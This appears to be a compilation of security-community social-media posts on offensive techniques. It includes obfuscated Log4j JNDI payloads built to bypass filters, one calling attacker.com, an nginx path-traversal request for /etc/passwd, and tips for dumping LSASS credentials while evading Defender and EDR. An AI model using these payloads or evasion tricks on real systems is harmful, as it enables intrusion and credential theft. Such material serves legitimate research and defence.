Log4j2

${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} log4j bypass lol Lessons learned: Don't use Java.

If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} This gets past every filter I've found so far. There's no shortage of these bypasses. #log4j

If you grab a copy kd.exe, symsrv.dll, and dbghelp.dll (i.e. from EWDK ISO image) you can create full memory dump with "livekd64 -o mem.dmp". It is enough to put these binaries into one folder. Access to the symbols server or the correct version of ntkrnlmp.pdb will be required.

#bugbountytips #bugbounty Nginx Merge slashes Path traversal #nginx #RCE Payload : GET ///////../../../etc/passwd More..bit.ly/33ge4jq

Added a small update to nanodump, you can now create a snapshot of LSASS with PssNtCaptureSnapshot. Thanks to matteo malvica ⭕ for "Evading WinDefender ATP credential-theft: a hit after a hit-and-miss start" github.com/helpsystems/na…

Cas van Cooten LuemmelSec This is a brilliant resource: github.com/commial/experi…

Exploiting CVE-2021-26708 (Linux kernel) with sshd hardenedvault.net/2022/03/01/poc…

Not really understand this "Industrial Spy" gang. They pwn networks, steals files, then instead of clearly asking a ransom, they leave something more like an ad for their leak/market site? 🤔 Michael Gillespie

I have found vulnerabilities CVE-2022-31656 and CVE-2022-31659 leading to unauthenticated remote code execution affecting many #VMware products, such as Workspace ONE. Technical writeup and POC soon to follow. Recommend to patch or mitigate immediately. vmware.com/security/advis…

🫢 Backdoor password in a ZIP! 1⃣ Create ZIP: 7z a x.zip /etc/passwd -mem=AES256 -p Use this pwd: Nev1r-G0nna-G2ve-Y8u-Up-N5v1r-G1nna-Let-Y4u-D1wn-N8v4r-G5nna-D0sert-You 2⃣ Unpack it: 7z e x.zip Use this pwd: pkH8a0AqNbHcdw8GrmSp 😅 Magic!

Happy to share a new blog post I wrote about how I managed to dump LSASS undetected using a simple MiniDumpWriteDump against some of the most advanced EDRs in the market. "It’s all in the details: The curious case of an LSASS dumper gone undetected" dec0ne.github.io/research/2022-…

漏洞搜索引擎爱了爱了

I find it ridiculous that you just need to prepend one single null byte to a lsass dump to make Defender stop detecting it as soon as it touches disk. No encryption, no encoding, just a single null byte 😅😅

CVE-2023-26469: A critical RCE explained 👇 #CyberSecurity